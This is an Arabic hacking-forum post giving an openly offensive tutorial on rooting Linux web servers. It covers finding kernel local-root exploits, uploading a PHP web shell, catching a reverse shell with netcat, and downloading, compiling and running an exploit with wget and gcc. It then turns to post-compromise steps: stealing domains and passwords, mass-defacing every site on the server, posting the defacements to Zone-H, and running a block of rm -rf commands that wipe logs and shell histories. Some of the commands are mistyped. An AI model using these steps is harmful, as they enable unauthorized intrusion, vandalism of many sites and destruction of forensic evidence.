اهلا وسهلا بكم ياعناكب في موضوعي (Root in server) الذي سوف يشرح لكم كيفية اخذ الروت وماذا تفعل بعد اخذ الروت وكل شيء متعلق بلروت
في بداية الامر سوف ينقسم هذا الموضوع الى :
الجزء الاول: ماهو الروت (What is root)
الجزء الثاني: كيف يمكن الحصول على الروت (How can I get on the root)
الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him)
الجزء الرابع: اتصال بلسيرفر بكل الطريق (Contact
Server Every way)
الجزء الخامس: الحصول على الروت (Access to root)
الجزء السادس: ماذا بعد الروت (What happens after root)
الجزء السابع: سحب الدومنين (The withdrawal of my domain)
الجزء الثامن: عمل ماس ديفس (The work of Mass Davis)
الجزء التاسع: التسجيل فى الزون اتش المواقع المخترقة (To register the zon-h hacked sites)
الجزء العشر: مسح اثارك من السيرفر (Clear the tracks from the serve)
الجزء الحادي عشر: بعض المواضع الاخرى للروت وبعد الروت
=====================
قبل ان ابدأ في الموضوع انة طرحت قبل هذا الموضوع موضعي [الروت تحت المجهر] وبسبب اخطأ بسيطة ان الصور انمسحت وصارت لخبطة فية وبعض المشاكل لذلك قررت ان انزل هذا الموضوع وجعلتة smilies4 مبني على ذلك الموضوع الروت تحت المجهر واضفت علية بس الشروحات الأقوى وبعض الصور التوضيحية لذلك اتمنى ان يعجبكم هذا الموضوع واتمنى ان يستفاد الكل وشكرا لك :kiss: وبدون اطالة نبدأ بلموضوع :yes:
الجزء الاول: ماهو الروت (What is root) 
الروت : هو اعلى صلاحية في السيرفر لينكس واذا حصل شخص على صلاحية الروت يكون السيرفر كلة في خطر تام كيف يكون السيرفر في خطر انة اقول لك يمكن بعد الحصول على الروت يمكن تسحب الدومنينات المواقع ويمكن تغير جميع انديكسات الموقع بأنديكس اختراق وهذا مايسمى بلــــماس ديفس وراح اشرح في الفقرات التالية وذا حصلت على الروت يكون السيرفر ملكك وهنا فهمنا ماهو الروت واكيد لي يريد يأخذ روت لازم يعرف ماهو الروت اصلا ويكون لدية خبرة في اختراق المواقع
الجزء الثاني: كيف يمكن الحصول على الروت (How can I get on the root) 
هناك طرق كثيرة في الحصول على الروت وسوف اذكر اهم الطرق وهي...)
1-عن طريق اللوكل روت وهي استغلال ثغرة في بكرنيل السيرفر ,وحسب اصدار الكرنيل
2-عن طريق استغلال ثغرات البرنامج لي على السيرفر
3-عن طريق قرأة الملفات لي يكون فية باسورد الروت << وعتقد ان هناك درس في دورة sql كيف اخذ باسورد الروت
وهم طريقة والطريقة الشائعة الان هي طريقة اللوكل الروت واصدار الكرنيل لان نشرح هذة الطريقة
لكل سيرفر كرنيل واصدار لهذا الكرنيل والهكر الكبار مثلي smilies8 هههههه يجدون ثغرة لهذا الاصدار الكرنيل وينقلون هذة الثغرة في اصدار الكرنيل الى مواقع السيكورتي واحنة نستغل هذة الثغرة ومايسمى بلوكل روت وعن طريق الاستغلال هذة الثغرة في السيرفر نحصل على الروت وان شاء الله اشرح لكم الطرق الباقية بأذن الله
الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him)
في البداية لنعرف ماهو لوكل الروت :برنامج مبرمج لستغلال ثغرة في اصدار الكرنيل ولوكلات مبرمجة بلغة c وهناك لوكلات مترجمة وذا كان اللوكل مبرمجة بلغة c يحتاج لها ترجمة قبل التشغيل وسوف اشرح لكم في الفقرات التالية بس كيف نفرق بين المترجم والغير مترجم انة اقول لك اذا لوكل منتهي بمتداد c فانة غير مترجم ويحتاج ترجمة واذا لوكل منتهي بغير امتداد او اي امتداد اخر فانة مترجم بس لماذا اللوكل دائما بلغة c لان نوة الكرنيل في نضام لينكس تكون مبرمجة بلغة c شفتوا لازم تتعلموا لينكس لانهو يفيدكم كثيرا :etonnement-29[1]:
الان كيف نعرف لوكل المناسب لنا وكيف نقوم بلبحث عنة قي البداية عندما ترفع الشل على السيرفر نقوم بتنفيذ الامر التالي (uname -a) او يمكن رؤية اصدار الكرنيل في بداية الشل كما في الصورة التالية
اصدار الكرنيل :
الي بلون الاخضر ذا اصدار الكرنيل
ولي بلون الازرق ذا النحديث نواة الكرنيل
او يمكن تنفيذ الامر التالي uname -a ايظا ليظهر لك اصدار لوكل
[IMG]
[/IMG]
الان نريد كيف نبحث على هذا اصدار الكرنيل نريد لة لوكل روت كيف
اولا:عن طريق الاخ قوقل كيف تروح لقوقل وتكتب
local root xxx
حيث xxx نضع بدلة اصدار الكرنيل
او
local root exploit xxx
حيث xxx اصدار الكرنيل نضعة بدلة
ولازم تعرف تحديث الكرنيل مثيل 2009 او 2010 لان كل لوكل يختلف في التحديث
ثانيا:عن طريق مواقع السكيورتي
سوف اشرح على اهم موقع لان والاقوى
هذا الموقع
http://www.exploit-db.com
وتضغط على كلمة Search من اعلى الخيارات ويظهر لك
كما في الصورة التالية في البحث
ونكتب في البحث كذا
localroot xxx
حيث xxx نضع بدلة اصدار الكرنيل
وتختار النوع
وان شاء الله راح تحصل على لوكل روت المناسب
وهذا مواقع لبحث على لوكل
كود PHP:
http://www.hoobie.net/security/exploits/index.html http://www.milw0rm.com/parse.php?platform=linux http://exploits.cx/exploits/index.p...exploits/kernel http://addict3d.org/index.php?page=archive&day=20030930 http://www.linuks.org/search.php?topic=linux http://www.mormoroth.by.ru/Local-Root/ http://www.mormoroth.by.ru/Archive/ http://www.packetstormsecurity.org/U...ts/index4.html http://securitydot.net/search/exploi...ocal+root.html http://www.packetstormsecurity.org/
وهذة المكتبة من انشائي الخاصة بشبكة العناكب الاحترافية
|~ُ مكتبة العناكب للوكلات روت ~ُ| الجزء الرابع: اتصال بلسيرفر بكل الطريق (Contact Server Every way) 
اهم يشيء بعد الحصول على لوكل روت هو الاتصال بلسيرفر يعني اذا ماتصلنة بلسيرفر ماراح نحصل على روت والاتصال بلسيرفر يعني بدل ماتروح لشل تروح لشلشة الدوس وتنفذ الاوامر وهناك طرق كثير لاتصال بلسيرفر وهناك موضوع لاخ فالكوني يشرح هذة الاتصال بثلاثة طرق وهذا رابط الموضوع
شرح الاتصال العكسي باعقد السيرفرات بثلاث طرق والاتصال ينجح باذن الله
وانة راح اشرح لكم طريقة رابعة لي مايستطيع فتح بورت في جهازة مثلي
هناك طرق كثيرة لتسجيل في موقع ريلاكس البخيل smilies13 ماني راح اشرح انتة احصل على حساب والان بعد الحصول على حساب
والان بعد الحصول على الحساب يمكنك ان تتصل وانشاء اتصال VPN
الان سوف اشرح لكم الاتصال بلسيرفر بعد ماعملة اتصال VPN يلا نبدأ على بركة الله
في البداية الأمر نحمل هذة الاداة وهي netcat
كود PHP:
http://www.4shared.com/file/Y24T3K5i/netcat.html
نفك الضغط عنها ونضعها على مسار الهارد c او اي هارد انتة واضع الوندوز فية
الان كل شيء تمام نحمل هذا الشل وهو شل Egy_Spider العربي الاصدار الثاني القوى والافضل والاروع لحد الان في سنة 2010 الجديد كليا
كود PHP:
http://www.4shared.com/file/tEh29RB6/Egy_Spider_Ar.html
نرفع الشل على موقع المصاب او الموقع لي انتة تريد الحصول علية على روت اوكي
الان نذهب الى الدوس كما يلي
start>>Run>>cmd
تم الدخول لــــ Dos
ونضع الامر التالي
cd\
وبعد ذلك ندخل الى حافظة النت كات بلأمر
cd netcat
تم الدخول
اوكي كل شيء تمام الان نذهب الى هذا الموقع
كود PHP:
http://www.ip-adress.com/
لمعرفة ip الخاص فينة
الان نذهب الى الشل لي احنة رافعينة على الموقع الى اخر الشل
1-ip لي احنة طلعناة من الموقع لي فوق
2-البورت وراح نستخدم بورت 443 البورت الخاص في اتصال ريلاكس
3-لانغير شيء
4-لاتضغ الان بعد قليل من اقول لك
الان كل شيء تمام نرجع الى النت كات
ونكتب الامر
nc -vlp port
مع تغير port
الى 443 بورت اتصال ريلاكس
الان نضغط انتر (enter)
ونذهب الى الشل ونضغط رقم اربعة وهو (Connect)
الان تم الاتصال بلشل الان انتهينة من هذة الخطوة الحمد لله
ولي مايستطيع الحصول على حساب ريلاكس يمكنة استخدام هذا البرنامج فهوا عملة نفس عمل حساب ريلاكس واسم البرنامج هو proXPN ويمكنك البحث عنة بغرغور (يعني قوقل) وسوف تجد لة شروحات كثيرة وهو مشهور جدا ^_*
الجزء الخامس: الحصول على الروت (Access to root)
بعد ما اتصلنة بلسيرفر ووجدنة اللوكل المناسب الان نريد سحب الروت على السيرفر
اول شيء لحصول على الروت هو سحب لوكل على الموقع ويقصل ان يكون المجلد يحمل تصريح 777
ويسحب اللوكل بامر
wegt
www.viers.com/localroot.zip wegt<<<الامر السحب
www.viers.com/local.zip<<<موقع لوكل او انتة ترفع لوكل على اي موقع مجاني ويفض لوكل بمتداد zip
الان تم السحب
نفط الضغط بامر
unzip local.zip unzip<<<امر فك الضغط
local.zip<<<اسم لوكل مع الامتداد
الان نعطي لوكل تصريح 777 بامر
chmod 777 local.c chmod<<<امر تغير تصريح اي ملف
777<<<رقم التصريح
local.c<<<لوكل
بعد ذلك نترجم اللوكل بامر التالي
gcc local.c –o local
بعد سوف تجد لوكل بدون امتداد هكذا
local
بعد ذلك نعطي اللوكل المترجم تصريح 777 بامر التالي
chmod 777 local
بعد ذلك نشغل اللوكل بامر
local ./
وسوف يشتغل لوكل
نقوم بتنفيذ الامر التالي لرؤية الاصلاحية الان
id
الان صلاحيتنة روت
ننفذ لامر التالي
su
لحصول على صلاحية روت كاملة
وهذا شرح لحصول على الروت
[hide]
اضغط هنا [/hide]
[hide]
كود PHP:
الحقوق محفوضة لــــ SnakE1095
[/hide]
لكن هناك لوكلات مختلفة يراد لة عمل مختلف لكن اذا تريد تحترف في اخذ روت واي سيرفر يقابلك تأخذ روت وتتجاوز اي معوق امامك علية اذان حمل كل هذة الدرس قي الموضوع التالي
اضغط هنا الجزء السادس: ماذا بعد الروت (What happens after root) 
بعد الروت ماذا تفعل اممممم تعرف كل شيء تستطيع ان تفعلة مثل سحب الدومينات المواقع ورفع الانديكس على الموقع على السيرفر ومايسمى (بلماس ديفس) وتستطيع سحب الباسوردات المواقع وسحب السي بنلات المواقع بختصار كل شيء تسطتيع ان تفعل مسح تعديل على المواقع وغيرة
لكن انة سوف اشرح لكم اهم الاشياء بلـــروت ودائما الهكر تفعلة وهي عمل ماس ديفس وهي تغير جميع انديكسات السيرفرات الى انديكس الاختراق وسحب الدومينات السيرفر ..الخ
الجزء السابع: سحب الدومنين (The withdrawal of my domain)
راح اعطيكم شرح فيديوا لسحب الدمنين المواقع على السيرفر الحقوق او الطريق محفوظة لمنتديات القراصنة السعودية
[hide]
كود PHP:
http://www.4shared.com/file/147395310/2574ebd2/ee_online.html
[/hide]
الجزء الثامن: عمل ماس ديفس (The work of Mass Davis)
الماس الديفس الفائدة من هو تغير جميع صفحات المواقع لي على السيرفر الى انديكس الاختراق بدل ماتروح لموقع موقع وتغير الانديكس مثلا يوجد انديكس في مجلد وفية مجلد اخر داخل هذا المجلد وفية index.html يقوم بتغيرة منة هنا تأتي الفائدة من هذة السكريب طبعا السكريب بلغة البيرل perl
وهنا شرح فيديوا لعمل ماس ديفس + السكريب لعمل ماس ديفس
اضغط هنا
لتحميل
جميع الحقوق محفوضة لصاحب الشرح
الجزء التاسع: التسجيل فى الزون اتش المواقع المخترقة (To register the zon-h hacked sites) 
بعد ماتقوم بعمل ماس ديفس وتغير جميع الانديكسات الموقع وتريد سجل اختراق المواقع لي على السيرفر في زون اتش والمواقع لي على السيرفر 250 موقع كيف اذا سجل الاختراق تأخذ واحد واحد بس هاي العملية طويلة ومجهدة لذلك اتى سكريب بلغة البيريل يسجل اخترقاتك في الزون اتش بدقيقة وهذا شرح موجود في المنتدى
سكربت للتسجيل بالزون إتش 
الجزء العشر: مسح اثارك من السيرفر (Clear the tracks from the serve) 
بعد عمل ماس ديفس لازم نقوم بمسح اثارك على السيرفر ويوجد بياناتك في ملف اسمة لوقل هسة تقول لي ماهو ملف لوقل هو ملف يقوم بحفظ اي بي تبعك واثاراك على السيرفر طيب كيف نمسحة انة اقول لك بمجموعة من الأوامر تنفذة على السيرفر وسوف ينمسح ملف لوقل بأذن الله
وهذة الأوامر:قم بتنفيذ بعد الحصول على صلاحية الروت وعمل ماس ديفس *_*
[hide]
كود PHP:
rm -rf /tmp/logs rm -rf $HISTFILE rm -rf /root/.ksh_history rm -rf /root/.bash_history rm -rf /root/.ksh_history rm -rf /root/.bash_logout rm -rf /usr/local/apache/logs rm -rf /usr/local/apache/log rm -rf /var/apache/logs rm -rf /var/apache/log rm -rf /var/run/utmp rm -rf /var/logs rm -rf /var/log rm -rf /var/adm rm -rf /etc/wtmp rm -rf /etc/utmp find / -name *.bash_history -exec rm -rf {} \; find / -name *.bash_logout -exec rm -rf {} \; find / -name "log*" -exec rm -rf {} \; find / -name *.log -exec rm -rf {} \;
[/hide]
الجزء الحادي عشر: بعض المواضيع الاخرى للروت وبعد الروت
[ مآ بعد آلروت ] وش تـسوي .. آدخل آقلك ..
[ مآ بعد آلروت ] وش تـسوي .. آدخل آقلك .. 
شرح حصول على صلاحيات root من لوحة تحكم ][WHMC][
شرح حصول على صلاحيات root من لوحة تحكم ][WHMC][
شرح اخذ رووت عبر ثغرات الكرنال او بما يسمى لوكال رووت (فديو)
شرح اخذ رووت عبر ثغرات الكرنال او بما يسمى لوكال رووت (فديو)
وفي مواضيع كثير بلمنتدى ابحث عنها بلمنتدى وسوف تجدها بأذن الله
اتمنى ان يعجبكم موضيعي واتمنى ان تفهوا كيف اخذ الروت ولي مايعرف بعد كيف يأخذ روت خل يبطل افضل لك
smilies18
لاتحرموني من ردرودك ولاتنسوى التقيم وان شاء الله فية المزيد والمزيد :Great: من اجل تطوير هذا المنتدى الرائع وشكرا لك وتحياتي وتقديري الى الكل :00001734[1]:
تم الشرح بواسطة:
ViRuS Qalaa
جميع الحقوق محفوظة smilies11
والى لقاء ولاتنسوا التقيم + الردود
والاهداء الموضوع الى :
الى كل اعضاء ومدراء ومشرفين ومراقبين المنتدى
09-09-2010, 02:28 AM
|~Root In Server By ViRuS Qalaa~| 
المواضيع المتشابهه 
العرض العادي
